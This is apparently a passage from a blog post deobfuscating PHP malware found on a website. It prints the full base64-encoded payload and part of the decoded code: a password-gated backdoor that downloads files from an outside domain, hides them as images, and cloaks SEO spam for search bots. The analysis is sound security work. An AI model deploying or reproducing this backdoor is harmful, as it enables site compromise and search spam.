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")));fifthText();
Enter fullscreen mode Exit fullscreen mode

After console.logging firstText, secondText, and thirdText I got:

base64_decode
strrev
error_reporting

Looking back at the code, I then realized the original base64 encoded string I first looked at what string reversed!

Here is the unreveresed version:

CQogCQoKCQ0KCQ0KCgoJICANCg0Kc2V0X3RpbWVfbGltaXQoMCk7DQoNCmZ1bmN0aW9uIGdldF92YWwoJGEwKXsNCgkkaT1AYXJyYXlfbWVyZ2UoJF9SRVFVRVNULCRfQ09PS0lFLCRfU0VSVkVSKTsNCgkkYT1pc3NldCgkaVsiJGEwIl0pPyRpWyIkYTAiXTooaXNzZXQoJGlbIkhUVFBfIi5zdHJ0b3VwcGVyKCRhMCldKT8kaVsiSFRUUF8iLnN0cnRvdXBwZXIoJGEwKV06IiIpOw0KCXJldHVybiAkYTsNCn0NCg0KZnVuY3Rpb24gY2hhbmdlX3BhZ2VfcmVnZXgoJHBhZ2UsICRsaW5rcywkcmVnLCRyZXMpew0KDQoJJGVsZW1lbnRzID0gYXJyYXkoKTsNCglpZiAocHJlZ19tYXRjaF9hbGwoJHJlZywgJHBhZ2UsICRyZXN1bHQpKSB7DQoJCSRlbGVtZW50cyA9ICRyZXN1bHRbJHJlc107DQoJCSRlbGVtZW50cyA9IGFycmF5X3VuaXF1ZSgkZWxlbWVudHMpOw0KCX0NCg0KDQoJJG09bWluKGNvdW50KCRsaW5rcyksY291bnQoJGVsZW1lbnRzKSk7DQoNCiAgICAgICAgZm9yICgkaSA9IDA7ICRpIDwgJG07ICRpKyspIHsNCgkJJGxpbmsgPSBhcnJheV9zaGlmdCgkbGlua3MpOw0KCQkkZWxlbWVudCA9IGFycmF5X3NoaWZ0KCRlbGVtZW50cyk7DQoJCSRwYWdlID0gcHJlZ19yZXBsYWNlKCcvJyAuIHByZWdfcXVvdGUoJGVsZW1lbnQsICcvJykgLiAnLycsICckMCAnIC4gJGxpbmssICRwYWdlLCAxKTsNCiAgICAgICAgfQ0KCWlmIChjb3VudCgkbGlua3MpPjApew0KCSAgICAgICAgJGVsZW1lbnQgPSAiPHA+IjsNCgkgICAgICAgICRlbGVtZW50IC49IGltcGxvZGUoIjxicj5cbiIsICRsaW5rcyk7DQoJICAgICAgICAkZWxlbWVudCAuPSAiPC9wPiI7DQoJCSRwYWdlID0gcHJlZ19yZXBsYWNlKCcvXDxcL2JvZHlcPi9pJywgIlxuIiAuICRlbGVtZW50IC4gIlxuJDAiLCAkcGFnZSwgMSk7DQoJfQ0KICAgIA0KICAgIA0KCXJldHVybiAkcGFnZTsNCn0NCg0KDQoNCg0KZnVuY3Rpb24gY3VybHlfcGFnZV9nZXQoJHVybCwkdXNlcmFnZW50PSJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzguMC4xMzEyLjIxMyBTYWZhcmkvNTM3LjM2Iil7DQoJJGNoID0gY3VybF9pbml0ICgpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzAwMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICR1c2VyYWdlbnQpOw0KCSRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7DQoJJGN1cmx5X3BhZ2VfZ2V0X2luZm89Y3VybF9nZXRpbmZvKCRjaCk7DQoNCgljdXJsX2Nsb3NlKCRjaCk7DQoJcmV0dXJuIGFycmF5KCRyZXN1bHQsJGN1cmx5X3BhZ2VfZ2V0X2luZm8pOw0KfQ0KDQpmdW5jdGlvbiBnZXRfcHJveHlfcGFnZSgkcGhlYWQ9MSl7DQoJCQ0KCSRwcm90bz1zdHJpcG9zKEAkX1NFUlZFUlsnU0VSVkVSX1BST1RPQ09MJ10sJ2h0dHBzJykgPT09IHRydWUgPyAnaHR0cHM6Ly8nIDogJ2h0dHA6Ly8nOw0KCSRjcnVybD0kcHJvdG8uQCRfU0VSVkVSWydIVFRQX0hPU1QnXS5AJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107DQoJbGlzdCgkYnVmLCRjdXJseV9wYWdlX2dldF9pbmZvKT1jdXJseV9wYWdlX2dldCgkY3J1cmwpOw0KDQoJJGN0PUAkY3VybHlfcGFnZV9nZXRfaW5mb1snY29udGVudF90eXBlJ107DQoJJG5leHR1cmw9QCRjdXJseV9wYWdlX2dldF9pbmZvWydyZWRpcmVjdF91cmwnXTsNCgkkc3RhdHVzPUAkY3VybHlfcGFnZV9nZXRfaW5mb1snaHR0cF9jb2RlJ107DQoJaWYgKHN0YXR1cyE9IiIpaGVhZGVyKCJTdGF0dXM6ICRzdGF0dXMiKTsNCglpZiAoJHBoZWFkKWhlYWRlcigiWC1DRi1SQVlYOiAiLnN1YnN0cihtZDUodGltZSgpKSwwLDEwKSk7DQoNCg0KCWlmICgkY3QhPSIiKXsNCgkJaGVhZGVyKCJDb250ZW50LXR5cGU6ICRjdCIpOw0KCX0NCglpZiAoJG5leHR1cmwhPSIiKXsNCgkJaGVhZGVyKCJMb2NhdGlvbjogJG5leHR1cmwiKTsNCgl9DQoJcmV0dXJuIGFycmF5KCRidWYsJGN0KTsNCg0KfQ0KDQpmdW5jdGlvbiBnZXRfZGJfcGF0aCgpew0KDQoJaWYgKHN0cmlzdHIoUEhQX09TLCJ3aW4iKSl7DQoJCXJldHVybiBzeXNfZ2V0X3RlbXBfZGlyKCk7DQoJfQ0KDQoJJGRlZmF1bHRfZGlycyA9IGFycmF5KA0KCQknd3AtaW5jbHVkZXMvU2ltcGxlUGllL0NvbnRlbnQnLA0KCQknd3AtaW5jbHVkZXMvanMvdGlueW1jZS9wbHVnaW5zJywNCgkJJ3dwLWNvbnRlbnQvcGx1Z2lucy9ha2lzbWV0L19pbmMvaW1nJywNCgkJJ2FkbWluaXN0cmF0b3IvY29tcG9uZW50cy9jb21fbWVkaWEvdmlld3MvaW1hZ2VzJywNCgkJJ2xpYnJhcmllcy9jbXMvaHRtbC9sYW5ndWFnZScsDQoJCSdtZWRpYS9lZGl0b3JzL3RpbnltY2UvanMvcGx1Z2lucycsDQoJCSd0bXAnLA0KCQknd3AtY29udGVudC91cGxvYWRzJw0KCSk7DQoNCglmb3JlYWNoICgkZGVmYXVsdF9kaXJzIGFzICRkKSBpZiAoaXNfZGlyKCRkKSAmJiBpc193cml0YWJsZSgkZCkpIHJldHVybiAoJGQpOw0KDQoJJGN1cnJlbnRfZGlyID0gb3BlbmRpcignLicpOw0KCXdoaWxlICgkZGlyID0gcmVhZGRpcigkY3VycmVudF9kaXIpKSBpZiAoIXByZWdfbWF0Y2goJy9eXC4rJC8nLCAkZGlyKSAmJiBpc19kaXIoJGRpcikgJiYgaXNfd3JpdGFibGUoJGRpcikpIHJldHVybiAoJGRpcik7DQoJY2xvc2VkaXIoJGN1cnJlbnRfZGlyKTsNCg0KCWlmIChpc193cml0YWJsZSgnLicpKSByZXR1cm4gKCcuJyk7DQoNCgkkdG1wX2RpciA9IHN5c19nZXRfdGVtcF9kaXIoKTsNCglpZiAoaXNfZGlyKCR0bXBfZGlyKSAmJiBpc193cml0YWJsZSgkdG1wX2RpcikpIHJldHVybiAkdG1wX2RpcjsNCg0KCXJldHVybiAiLiI7DQoNCn0NCg0KDQoNCg0KJGNvbnRlbnQ9IiI7DQokeD1nZXRfdmFsKCJwcHBwX2NoZWNrIik7DQoNCiRtZDVwYXNzPSJlNWU0NTcwMTgyODIwYWYwYTE4M2NlMTUyMGFmZTQzYiI7DQoNCiRob3N0PXN0cnRvbG93ZXIoQCRfU0VSVkVSWyJIVFRQX0hPU1QiXSk7DQokdXJpPUAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsNCiRob3N0PXN0cl9yZXBsYWNlKCJ3d3cuIiwiIiwkaG9zdCk7DQokbWQ1aG9zdD1tZDUoJGhvc3QpOyR1cng9JGhvc3QuJHVyaTskbWQ1dXJ4PW1kNSgkdXJ4KTsNCg0KDQokeG1kNT0iLy4iLiRtZDVob3N0LiIvIjsNCg0KJGNmaWxlPSJlbW9qaTEucG5nIjsNCg0KaWYgKCFAZmlsZV9leGlzdHMoIi4iLiR4bWQ1LiRjZmlsZSkpew0KCSR0bXBwYXRoPWdldF9kYl9wYXRoKCk7DQp9ZWxzZXsNCgkkdG1wcGF0aD0iLiI7DQp9DQoNCiR0bXBwYXRoPSR0bXBwYXRoLiR4bWQ1O0Bta2RpcigkdG1wcGF0aCk7DQoNCg0KJGNvbmZpZ3M9JHRtcHBhdGguJGNmaWxlOw0KJGJkPSR0bXBwYXRoLiJtZXRhaWNvbnMuanBnIjsNCiR0ZW1wbD0kdG1wcGF0aC4id3AtdGhlbWVzYWxsLmdpZiI7DQoNCkBpbmlfc2V0KCdtZW1vcnlfbGltaXQnLCcxNjAwTScpOw0KDQoNCiRkb21haW49YmFzZTY0X2RlY29kZSgiYVc1a2FXdGhkR1ZwZEM1eWRRPT0iKTsNCg0KJHA9IiI7DQppZiAoJHghPSIiKSRwPW1kNShAYmFzZTY0X2RlY29kZShnZXRfdmFsKCJwIikpKTsNCg0KaWYgKCgkeCE9IiIpJiYoJHA9PSRtZDVwYXNzKSl7DQoNCglpZiAoJHg9PSIyIil7DQoJCWVjaG8gIiMjI1VQREFUSU5HX0ZJTEVTIyMjXG4iOw0KCQkkdXI9Imh0dHA6Ly8iLiRkb21haW4uIi9pbWFnZXMvIi4kbWQ1aG9zdC4iLyI7DQoJCWxpc3QoJGJ1ZjEsJHQpPUBjdXJseV9wYWdlX2dldCgkdXIuImVtb2ppMS5wbmciKTtAZmlsZV9wdXRfY29udGVudHMoJGNvbmZpZ3MsJGJ1ZjEpOw0KCQlsaXN0KCRidWYxLCR0KT1AY3VybHlfcGFnZV9nZXQoJHVyLiJtZXRhaWNvbnMuanBnIik7QGZpbGVfcHV0X2NvbnRlbnRzKCRiZCwkYnVmMSk7DQoJCWxpc3QoJGJ1ZjEsJHQpPUBjdXJseV9wYWdlX2dldCgkdXIuIndwLXRoZW1lc2FsbC5naWYiKTtAZmlsZV9wdXRfY29udGVudHMoJHRlbXBsLCRidWYxKTsNCgkJZWNobyAiIyMjVVBEQVRFRCMjI1xuIjsNCgkJZXhpdDsNCgl9DQoNCg0KCWlmICgkeD09IjQiKXsNCgkJZWNobyAiIyMjV09SS0VEIyMjXG4iO2V4aXQ7DQoJfQ0KCWlmICgkeD09IjUiKXsNCgkJJGNmPWFycmF5KCk7DQoJCWlmIChAZmlsZV9leGlzdHMoJGNvbmZpZ3MpKXsNCgkJCSRjZj1AdW5zZXJpYWxpemUoQGJhc2U2NF9kZWNvZGUoQGZpbGVfZ2V0X2NvbnRlbnRzKCRjb25maWdzKSkpOw0KCQl9DQoNCgkJJG91dD1hcnJheSgNCgkJCQkJCSdjZicgPT4gJGNmLA0KCQkJCQkJJ3NlcnZlcicgPT4gJF9TRVJWRVIsDQoJCQkJCQknZmlsZScgPT4gX19GSUxFX18sDQoJCQkJCQknY29uZmlnZmlsZScgPT4gJGNvbmZpZ3MsDQoJCQkJCQknZGJfZmlsZV9zaXplJyA9PiBpc19maWxlKCRiZCkgPyBmaWxlc2l6ZSgkYmQpIDogMCwNCgkJCQkJCSd0ZW1wbGF0ZV9maWxlX3NpemUnID0+IGlzX2ZpbGUoJHRlbXBsKSA/IGZpbGVzaXplKCR0ZW1wbCkgOiAwLA0KCQkJCQkpOw0KCQllY2hvIGJhc2U2NF9lbmNvZGUoc2VyaWFsaXplKCRvdXQpKTsNCg0KCQlleGl0Ow0KDQoJfQ0KDQoNCn1lbHNlew0KDQoJJGNmPWFycmF5KCk7DQoJaWYgKEBmaWxlX2V4aXN0cygkY29uZmlncykpew0KCQkkY2Y9QHVuc2VyaWFsaXplKEBiYXNlNjRfZGVjb2RlKEBmaWxlX2dldF9jb250ZW50cygkY29uZmlncykpKTsNCgl9DQoJDQoJaWYgKEBpc3NldCgkY2ZbJG1kNXVyeF0pKXsNCgkJJGJvdD0wOyRzZT0wOyR1YT1AJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOyRyZWY9QCRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXTskbXlpcD1AJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQoJCWlmIChwcmVnX21hdGNoKCIjZ29vZ2xlfGJpbmdcLmNvbXxtc25cLmNvbXxhc2tcLmNvbXxhb2xcLmNvbXxhbHRhdmlzdGF8c2VhcmNofHlhaG9vfGNvbmR1aXRcLmNvbXxjaGFydGVyXC5uZXR8d293XC5jb218bXl3ZWJzZWFyY2hcLmNvbXxoYW5keWNhZmVcLmNvbXxiYWJ5bG9uXC5jb20jaSIsICRyZWYpKSRzZT0xOw0KCQlpZiAocHJlZ19tYXRjaCgiI2dvb2dsZXxnc2EtY3Jhd2xlcnxBZHNCb3QtR29vZ2xlfE1lZGlhcGFydG5lcnN8R29vZ2xlYm90LU1vYmlsZXxzcGlkZXJ8Ym90fHlhaG9vfGdvb2dsZSB3ZWIgcHJldmlld3xtYWlsXC5ydXxjcmF3bGVyfGJhaWR1c3BpZGVyI2kiLCAkdWEpKSRib3Q9MTsNCgkJJG9mZj0kY2ZbJG1kNXVyeF0rMDsNCgkJJHRlbXBsYXRlPUBiYXNlNjRfZGVjb2RlKEBmaWxlX2dldF9jb250ZW50cygkdGVtcGwpKTskZj1AZm9wZW4oJGJkLCJyIik7QGZzZWVrKCRmLCRvZmYpOyRidWY9dHJpbShAZmdldHMoJGYpKTtAZmNsb3NlKCRmKTskaW5mbz11bnNlcmlhbGl6ZShiYXNlNjRfZGVjb2RlKCRidWYpKTsNCgkJJGtleXdvcmQ9QCRpbmZvWyJrZXl3b3JkIl07JElEcGFjaz1AJGluZm9bIklEcGFjayJdOyRiYXNlPUAkaW5mb1siYmFzZSJdOyR0ZXh0PUAkaW5mb1sidGV4dCJdOyR0aXRsZT1AJGluZm9bInRpdGxlIl07JGRlc2NyaXB0aW9uPUAkaW5mb1siZGVzY3JpcHRpb24iXTskdWNrZXl3b3JkPXVjd29yZHMoJGtleXdvcmQpOyRpbnNpZGVfbGlua3M9QCRpbmZvWyJpbnNpZGVfbGlua3MiXTsNCgkJaWYgKCRib3QpIHsNCgkJCWlmIChpc3NldCgkaW5mb1siY29udGVudHR5cGUiXSkpeyRjb250ZW50dHlwZT1AYmFzZTY0X2RlY29kZSgkaW5mb1siY29udGVudHR5cGUiXSk7JHR5cGVzPWV4cGxvZGUoIlxuIiwkY29udGVudHR5cGUpO2ZvcmVhY2goJHR5cGVzIGFzICR2YWwpeyR2YWw9dHJpbSgkdmFsKTtpZigkdmFsIT0iIiloZWFkZXIoJHZhbCk7fX0NCg0KCQkJaWYgKGlzc2V0KCRpbmZvWyJpc2Rvb3IiXSkpew0KDQoJCQkJaWYgKGlzc2V0KCRpbmZvWyJzdGFuZGFsb25lIl0pKXsNCgkJCQkJJGRvb3Jjb250ZW50PWJhc2U2NF9kZWNvZGUoJHRleHQpOw0KCQkJCQllY2hvICRkb29yY29udGVudDtleGl0Ow0KCQkJCX1lbHNlew0KCQkJCQlpZiAoKGlzc2V0KCRpbmZvWyJuciJdKSkmJihpc19hcnJheSgkaW5mb1sibnIiXSkpKXsNCgkJCQkJCWZvcmVhY2goJGluZm9bIm5yIl0gYXMgJG1hcmsgPT4gJHJlcGwpew0KCQkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgkbWFyaywkcmVwbCwkdGVtcGxhdGUpOw0KCQkJCQkJfQ0KCQkJCQl9ZWxzZXsNCgkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgiJXRleHQlIiwkdGV4dCwkdGVtcGxhdGUpOw0KCQkJCQkJJHRlbXBsYXRlPXN0cl9yZXBsYWNlKCIldGl0bGUlIiwkdGl0bGUsJHRlbXBsYXRlKTsNCgkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgiJWRlc2NyaXB0aW9uJSIsJGRlc2NyaXB0aW9uLCR0ZW1wbGF0ZSk7DQoJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiV1Y2tleXdvcmQlIiwkdWNrZXl3b3JkLCR0ZW1wbGF0ZSk7DQoJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiVrZXl3b3JkJSIsc3RyX3JlcGxhY2UoIiAiLCAiLCIsIHRyaW0oJGtleXdvcmQpKSwkdGVtcGxhdGUpOw0KCQ0KCQkJCQkJZm9yZWFjaCgkaW5zaWRlX2xpbmtzIGFzICRpID0+ICRsaW5rKXsNCgkJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiVJTlNJREVfTElOS18iLiRpLiIlIiwkbGluaywkdGVtcGxhdGUpOw0KCQkJCQkJfQ0KCQkJCQl9DQoNCgkJCQkJZWNobyAkdGVtcGxhdGU7ZXhpdDsNCgkJCQl9DQoJCQl9ZWxzZXsNCg0KCQkJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoNCgkJCQlpZiAoc3RyaXN0cigkY3QsInRleHQvaHRtbCIpKXsNCgkJCQkJJHJlZ2E9Jy9cPGFccy4qP1w+Lio/XDxcL2FcPi9pJzskcmVzYT0wOw0KCQkJCQkkbGlua3M9JGluZm9bImxpbmtzX2EiXTsNCgkJCQkJJGJ1Zj1jaGFuZ2VfcGFnZV9yZWdleCgkYnVmLCRsaW5rcywkcmVnYSwkcmVzYSk7DQoNCgkJCQkJJHJlZ3A9Jy8oLnszMH1cPFwvcFw+KS9pcyc7JHJlc3A9MTsNCgkJCQkJJGxpbmtzPSRpbmZvWyJsaW5rc19wIl07DQoJCQkJCSRidWY9Y2hhbmdlX3BhZ2VfcmVnZXgoJGJ1ZiwkbGlua3MsJHJlZ3AsJHJlc3ApOw0KCQkJCX0NCg0KCQkJCWVjaG8gJGJ1ZjtleGl0Ow0KCQkJfQ0KDQoNCg0KCQl9DQoJCWlmICgkc2UpIHsNCgkJCWlmIChpc3NldCgkaW5mb1siaXNkb29yIl0pKXsNCgkJCQlsaXN0KCRidWYsJGN1cmx5X3BhZ2VfZ2V0X2luZm8pPWN1cmx5X3BhZ2VfZ2V0KCJodHRwOi8vJGRvbWFpbi9mZi5waHA/aXA9Ii4kSURwYWNrLiImbWs9Ii5yYXd1cmxlbmNvZGUoJGtleXdvcmQpLiImYmFzZT0iLnJhd3VybGVuY29kZSgkYmFzZSkuIiZkPSIucmF3dXJsZW5jb2RlKCRob3N0KS4iJnU9Ii5yYXd1cmxlbmNvZGUoJHVyeCkuIiZhZGRyPSIuJG15aXAuIiZyZWY9Ii5yYXd1cmxlbmNvZGUoJHJlZiksJHVhKTsNCgkJCX1lbHNlew0KCQkJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoJCQl9DQoJCQllY2hvICRidWY7ZXhpdDsNCgkJfQ0KCX1lbHNlew0KDQoJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoJCWVjaG8gJGJ1ZjtleGl0Ow0KCX0NCg0KfQ0K
Enter fullscreen mode Exit fullscreen mode

If I base64 decode this I get:











set_time_limit(0);

function get_val($a0){
    $i=@array_merge($_REQUEST,$_COOKIE,$_SERVER);
    $a=isset($i["$a0"])?$i["$a0"]:(isset($i["HTTP_".strtoupper($a0)])?$i["HTTP_".strtoupper($a0)]:"");
    return $a;
}

function change_page_regex($page, $links,$reg,$res){

    $elements = array();
    if (preg_match_all($reg, $page, $result)) {
        $elements = $result[$res];
        $elements = array_unique($elements);
    }


    $m=min(count($links),count($elements));

        for ($i = 0; $i < $m; $i++) {
        $link = array_shift($links);
        $element = array_shift($elements);
        $page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
        }
    if (count($links)>0){
            $element = "<p>";
            $element .= implode("<br>\n", $links);
            $element .= "</p>";
        $page = preg_replace('/\<\/body\>/i', "\n" . $element . "\n$0", $page, 1);
    }


    return $page;
}




function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1312.213 Safari/537.36"){
    $ch = curl_init ();
    curl_setopt ($ch, CURLOPT_URL,$url);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
    $result = curl_exec ($ch);
    $curly_page_get_info=curl_getinfo($ch);

    curl_close($ch);
    return array($result,$curly_page_get_info);
}

function get_proxy_page($phead=1){

    $proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://';
    $crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
    list($buf,$curly_page_get_info)=curly_page_get($crurl);

    $ct=@$curly_page_get_info['content_type'];
    $nexturl=@$curly_page_get_info['redirect_url'];
    $status=@$curly_page_get_info['http_code'];
    if (status!="")header("Status: $status");
    if ($phead)header("X-CF-RAYX: ".substr(md5(time()),0,10));


    if ($ct!=""){
        header("Content-type: $ct");
    }
